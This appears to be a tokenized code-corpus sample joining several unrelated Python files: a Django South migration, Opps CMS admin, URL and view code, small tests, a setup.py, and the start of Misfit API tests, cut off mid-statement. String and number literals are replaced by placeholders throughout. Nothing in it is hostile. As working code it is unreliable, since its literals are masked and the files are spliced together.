'<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : u"<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:4>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:source>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' 
: '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" % ( User . _meta . app_label , User . _meta . object_name ) } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:image>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> 
'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:4>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:source>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" % ( User . _meta . app_label , User . _meta . 
object_name ) } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:action>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:message>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:4>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" % ( User . _meta . app_label , User . _meta . 
object_name ) } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from django . conf . urls import patterns , url , include <EOL> from . views import OppsAutocompleteLookup <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , <EOL> OppsAutocompleteLookup . as_view ( ) , <EOL> name = "<STR_LIT>" ) , <EOL> ) </s>
<s> from django . contrib import admin <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django import forms <EOL> from django . contrib . auth import get_user_model <EOL> from django . contrib . sites . models import Site <EOL> from django . conf import settings <EOL> from opps . core . widgets import OppsEditor <EOL> from opps . channels . models import Channel <EOL> from . models import FlatPage <EOL> from opps . core . admin import apply_opps_rules <EOL> from opps . contrib . multisite . admin import AdminViewPermission <EOL> from opps . images . generate import image_url <EOL> class FlatPageAdminForm ( forms . ModelForm ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( FlatPageAdminForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> def clean_channel ( self ) : <EOL> if self . cleaned_data [ '<STR_LIT>' ] : <EOL> return self . cleaned_data [ "<STR_LIT>" ] <EOL> return Channel . objects . get_homepage ( site = self . 
cleaned_data [ '<STR_LIT>' ] ) <EOL> class Meta : <EOL> model = FlatPage <EOL> widgets = { '<STR_LIT:content>' : OppsEditor ( ) } <EOL> @ apply_opps_rules ( '<STR_LIT>' ) <EOL> class FlatPageAdmin ( AdminViewPermission ) : <EOL> form = FlatPageAdminForm <EOL> prepopulated_fields = { "<STR_LIT>" : [ "<STR_LIT:title>" ] } <EOL> readonly_fields = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> list_display = [ '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> raw_id_fields = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> fieldsets = ( <EOL> ( _ ( u'<STR_LIT>' ) , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) , <EOL> ( _ ( u'<STR_LIT>' ) , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:content>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) } ) , <EOL> ( _ ( u'<STR_LIT>' ) , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) , <EOL> ) <EOL> def image_thumb ( self , obj ) : <EOL> if obj . main_image : <EOL> return u'<STR_LIT>' . format ( <EOL> image_url ( obj . main_image . archive . url , width = <NUM_LIT> , height = <NUM_LIT> ) ) <EOL> return _ ( u'<STR_LIT>' ) <EOL> image_thumb . short_description = _ ( u'<STR_LIT>' ) <EOL> image_thumb . allow_tags = True <EOL> def save_model ( self , request , obj , form , change ) : <EOL> if getattr ( obj , '<STR_LIT>' , None ) is None : <EOL> obj . user = get_user_model ( ) . objects . get ( pk = request . user . pk ) <EOL> obj . site = Site . objects . get ( pk = settings . SITE_ID ) <EOL> if not obj . channel : <EOL> obj . channel = Channel . objects . get_homepage ( site = obj . site ) <EOL> obj . save ( ) <EOL> admin . site . register ( FlatPage , FlatPageAdmin ) </s>
<s> from django . http import Http404 <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . utils import timezone <EOL> from django import template <EOL> from django . conf import settings <EOL> from django . contrib . sites . models import get_current_site <EOL> from opps . articles . models import Album <EOL> from opps . containers . models import Container , ContainerBox <EOL> from opps . channels . models import Channel <EOL> from opps . fields . utils import field_template_read <EOL> class View ( object ) : <EOL> context_object_name = "<STR_LIT>" <EOL> paginate_by = settings . OPPS_PAGINATE_BY <EOL> limit = settings . OPPS_VIEWS_LIMIT <EOL> page_kwarg = '<STR_LIT>' <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . slug = None <EOL> self . channel = None <EOL> self . long_slug = None <EOL> self . article = None <EOL> self . child_class = u'<STR_LIT>' <EOL> self . excluded_ids = set ( ) <EOL> self . channel_long_slug = [ ] <EOL> super ( View , self ) . __init__ ( * args , ** kwargs ) <EOL> def get_channel_descendants_lookup ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = { '<STR_LIT>' : self . channel . tree_id } <EOL> if self . channel : <EOL> if self . __class__ . __module__ == "<STR_LIT>" : <EOL> obj [ '<STR_LIT>' ] = self . channel . lft <EOL> obj [ '<STR_LIT>' ] = self . channel . rght <EOL> elif self . __class__ . __module__ == "<STR_LIT>" : <EOL> obj [ '<STR_LIT>' ] = self . channel . lft <EOL> obj [ '<STR_LIT>' ] = self . channel . rght <EOL> return obj <EOL> def get_paginate_by ( self , queryset ) : <EOL> queryset = self . get_queryset ( ) <EOL> setting_name = '<STR_LIT>' . format ( queryset . <EOL> model . _meta . app_label , <EOL> queryset . model . <EOL> __name__ ) . upper ( ) <EOL> by_settings = getattr ( settings , setting_name , self . paginate_by ) <EOL> by_request = self . request . GET . get ( '<STR_LIT>' ) <EOL> by_channel = getattr ( self . 
channel , '<STR_LIT>' , None ) <EOL> return by_request or by_channel or by_settings <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = { } <EOL> self . channel = self . channel or Channel . objects . get_homepage ( <EOL> site = get_current_site ( self . request ) <EOL> ) <EOL> if not self . channel and getattr ( <EOL> settings , '<STR_LIT>' , None ) : <EOL> self . channel = Channel . objects . filter ( <EOL> homepage = True , published = True ) [ : <NUM_LIT:1> ] . get ( ) <EOL> context [ '<STR_LIT>' ] = self . channel <EOL> if not self . long_slug : <EOL> return context <EOL> context = super ( View , self ) . get_context_data ( ** kwargs ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> context [ '<STR_LIT>' ] = self . articleboxes <EOL> else : <EOL> context [ '<STR_LIT>' ] = ContainerBox . objects . filter ( <EOL> channel__long_slug = self . long_slug ) <EOL> self . excluded_ids = [ ] <EOL> for box in context [ '<STR_LIT>' ] : <EOL> self . excluded_ids += [ a . pk for a in box . ordered_containers ( ) ] <EOL> obj_filter = { } <EOL> obj_filter [ '<STR_LIT>' ] = self . site . domain <EOL> obj_filter [ '<STR_LIT>' ] = timezone . now ( ) <EOL> obj_filter [ '<STR_LIT>' ] = True <EOL> filters = obj_filter <EOL> filters [ '<STR_LIT>' ] = self . channel_long_slug <EOL> is_paginated = self . page_kwarg in self . request . GET <EOL> if self . channel and self . channel . is_root_node ( ) and not is_paginated : <EOL> filters [ '<STR_LIT>' ] = True <EOL> article = Container . objects . filter ( ** filters ) <EOL> context [ '<STR_LIT>' ] = article . filter ( <EOL> child_class = '<STR_LIT>' <EOL> ) . exclude ( pk__in = self . excluded_ids ) [ : self . limit ] <EOL> context [ '<STR_LIT>' ] = Album . objects . filter ( <EOL> ** filters <EOL> ) . exclude ( pk__in = self . excluded_ids ) [ : self . limit ] <EOL> context [ '<STR_LIT>' ] = { } <EOL> context [ '<STR_LIT>' ] [ '<STR_LIT>' ] = self . long_slug <EOL> if self . 
channel : <EOL> context [ '<STR_LIT>' ] = self . channel <EOL> context [ '<STR_LIT>' ] = self . get_breadcrumb ( ) <EOL> if self . slug : <EOL> try : <EOL> context [ '<STR_LIT>' ] = self . get_object ( ) . get_next_by_date_insert ( ** obj_filter ) <EOL> except self . get_object ( ) . DoesNotExist : <EOL> pass <EOL> try : <EOL> context [ '<STR_LIT>' ] = self . get_object ( ) . get_previous_by_date_insert ( ** obj_filter ) <EOL> except self . get_object ( ) . DoesNotExist : <EOL> pass <EOL> context [ '<STR_LIT>' ] = context [ '<STR_LIT>' ] . filter ( <EOL> containers__slug = self . slug ) <EOL> if self . get_object ( ) . child_class == '<STR_LIT>' : <EOL> context [ '<STR_LIT>' ] = self . get_object ( ) . container <EOL> if self . request . META . get ( '<STR_LIT>' , False ) or self . request . is_ajax ( ) : <EOL> context [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> try : <EOL> context [ '<STR_LIT>' ] . fields = field_template_read ( <EOL> context [ '<STR_LIT>' ] . custom_fields ( ) ) <EOL> except AttributeError : <EOL> pass <EOL> return context <EOL> def get_template_folder ( self ) : <EOL> domain_folder = "<STR_LIT>" <EOL> if self . site . id > <NUM_LIT:1> : <EOL> domain_folder = "<STR_LIT>" . format ( self . site . domain ) <EOL> return domain_folder <EOL> def get_long_slug ( self ) : <EOL> self . long_slug = self . kwargs . get ( '<STR_LIT>' , None ) <EOL> try : <EOL> if not self . long_slug : <EOL> self . long_slug = Channel . objects . get_homepage ( <EOL> site = self . site ) . long_slug <EOL> except AttributeError : <EOL> pass <EOL> return self . long_slug <EOL> def set_channel_rules ( self ) : <EOL> self . fallback = getattr ( settings , '<STR_LIT>' , False ) <EOL> filters = dict ( <EOL> site__domain = self . site . domain , <EOL> long_slug = self . long_slug , <EOL> date_available__lte = timezone . now ( ) , <EOL> published = True <EOL> ) <EOL> try : <EOL> self . channel = Channel . objects . get ( ** filters ) <EOL> except Channel . 
DoesNotExist : <EOL> if not self . fallback or self . site == self . site_master : <EOL> raise Http404 ( '<STR_LIT>' ) <EOL> filters [ '<STR_LIT>' ] = self . site_master . domain <EOL> self . channel = get_object_or_404 ( Channel , ** filters ) <EOL> self . long_slug = self . channel . long_slug <EOL> self . channel_long_slug = [ self . long_slug ] <EOL> self . channel_descendants = self . channel . get_descendants ( <EOL> include_self = False ) <EOL> for children in self . channel_descendants : <EOL> self . channel_long_slug . append ( children . long_slug ) <EOL> def get_breadcrumb ( self ) : <EOL> try : <EOL> if self . channel . is_root_node ( ) : <EOL> return [ ] <EOL> except : <EOL> return [ ] <EOL> return self . channel . get_ancestors ( include_self = True ) <EOL> def check_template ( self , _template ) : <EOL> try : <EOL> template . loader . get_template ( _template ) <EOL> return True <EOL> except template . TemplateDoesNotExist : <EOL> return False </s>
<s> from django . test import TestCase <EOL> from opps . fields . utils import field_template_read <EOL> class FieldTemplateReadlTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . dict = { "<STR_LIT>" : "<STR_LIT:1>" } <EOL> self . dict_out = { "<STR_LIT>" : "<STR_LIT:1>" } <EOL> def test_self_dict ( self ) : <EOL> read_on_template = field_template_read ( self . dict ) <EOL> self . assertNotEqual ( self . dict , self . dict_out ) <EOL> self . assertTrue ( read_on_template ) <EOL> self . assertEqual ( read_on_template , self . dict_out ) <EOL> def test_empty_dict ( self ) : <EOL> """<STR_LIT>""" <EOL> read_on_template = field_template_read ( { } ) <EOL> self . assertFalse ( read_on_template ) <EOL> self . assertEqual ( read_on_template , { } ) <EOL> def test_down_case ( self ) : <EOL> read_on_template = field_template_read ( self . dict_out ) <EOL> self . assertEqual ( read_on_template , self . dict_out ) </s>
<s> from django . contrib . auth import views as auth_views <EOL> from . import forms <EOL> def password_reset_confirm ( * args , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT>' , forms . SetPasswordForm ) <EOL> return auth_views . password_reset_confirm ( * args , ** kwargs ) <EOL> def password_change ( * args , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT>' , forms . PasswordChangeForm ) <EOL> return auth_views . password_change ( * args , ** kwargs ) </s>
<s> import re <EOL> from setuptools import setup <EOL> required = [ line for line in open ( '<STR_LIT>' ) . read ( ) . split ( "<STR_LIT:\n>" ) if line != '<STR_LIT>' ] <EOL> required_test = [ line for line in open ( '<STR_LIT>' ) . read ( ) . split ( "<STR_LIT:\n>" ) if not line . startswith ( "<STR_LIT>" ) and line != '<STR_LIT>' ] <EOL> fbinit = open ( '<STR_LIT>' ) . read ( ) <EOL> author = re . search ( "<STR_LIT>" , fbinit ) . group ( <NUM_LIT:1> ) <EOL> author_email = re . search ( "<STR_LIT>" , fbinit ) . group ( <NUM_LIT:1> ) <EOL> version = re . search ( "<STR_LIT>" , fbinit ) . group ( <NUM_LIT:1> ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> author = author , <EOL> author_email = author_email , <EOL> url = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> package_data = { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> include_package_data = True , <EOL> install_requires = [ "<STR_LIT>" ] + required , <EOL> license = '<STR_LIT>' , <EOL> test_suite = '<STR_LIT>' , <EOL> tests_require = required_test , <EOL> classifiers = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> import arrow <EOL> import json <EOL> import unittest <EOL> import sys <EOL> from httmock import HTTMock <EOL> from nose . tools import eq_ <EOL> from misfit import Misfit , MisfitGoal , MisfitSummary <EOL> from misfit . exceptions import MisfitException <EOL> from . mocks import MisfitHttMock <EOL> class TestMisfitAPI ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . misfit = Misfit ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_goal ( self ) : <EOL> """<STR_LIT>""" <EOL> goal_dict = { <EOL> "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT:date>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:1000> , <EOL> "<STR_LIT>" : - <NUM_LIT:8> <EOL> } <EOL> end_date = '<STR_LIT>' <EOL> with HTTMock ( MisfitHttMock ( '<STR_LIT>' ) . json_http ) : <EOL> goal_list = self . misfit . goal ( start_date = goal_dict [ '<STR_LIT:date>' ] , <EOL> end_date = end_date ) <EOL> eq_ ( len ( goal_list ) , <NUM_LIT:3> ) <EOL> goal = goal_list [ <NUM_LIT:0> ] <EOL> eq_ ( type ( goal ) , MisfitGoal ) <EOL> self . assert_misfit_string ( goal , goal_dict ) <EOL> eq_ ( goal_list [ <NUM_LIT:2> ] . date , arrow . get ( end_date ) ) <EOL> eq_ ( goal . id , goal_dict [ '<STR_LIT:id>' ] ) <EOL> eq_ ( goal . date , arrow . get ( goal_dict [ '<STR_LIT:date>' ] ) ) <EOL> eq_ ( goal . points , goal_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( goal . targetPoints , goal_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( goal . timeZoneOffset , goal_dict [ '<STR_LIT>' ] ) <EOL> self . assertAlmostEqual ( goal . percent_complete ( ) , <NUM_LIT:50> ) <EOL> goal . targetPoints = <NUM_LIT:0> <EOL> assert goal . 
